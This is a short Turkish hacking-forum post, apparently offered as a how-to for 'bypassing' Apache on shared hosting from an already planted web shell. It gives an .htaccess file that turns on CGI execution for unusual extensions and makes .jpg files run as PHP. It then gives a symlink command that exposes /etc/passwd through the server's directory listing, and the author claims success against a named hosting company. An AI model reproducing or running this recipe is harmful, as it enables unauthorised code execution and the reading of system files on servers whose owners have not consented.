sagol hocamApache server Bypass
View hidden content is available for registered users!
Kaynak =
Merhaba, Apache server nasıl bypass edilir onu göstereceğim (servera gore değişir);
Shellimize girip yeni bir dizin oluşturuyoruz,
Dizine geçtikten sonra .htaccess adında dosya oluşturuyoruz ve asagıdaki kodları yapıstırıyoruz.
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script log cgi pl tg love h4 tgb x-zone
AddType application/x-httpd-php .jpg
RewriteEngine on
RewriteRule (.*)\war$ .log
## END ##
ReadmeName sechell.txt
Bunu da yaptıktan sonra su komutu veriyoruz;
ln -s /etc/passwd sechell.txt
Ve oluşturduğumuz dizine yeniden giriyoruz;
Ve ekrana yansıdı, işlemimiz bu kadar fakat her sunucu bunu yemez.
Dipnot : Netiyi gibi firmalarda denedim ise yaradı.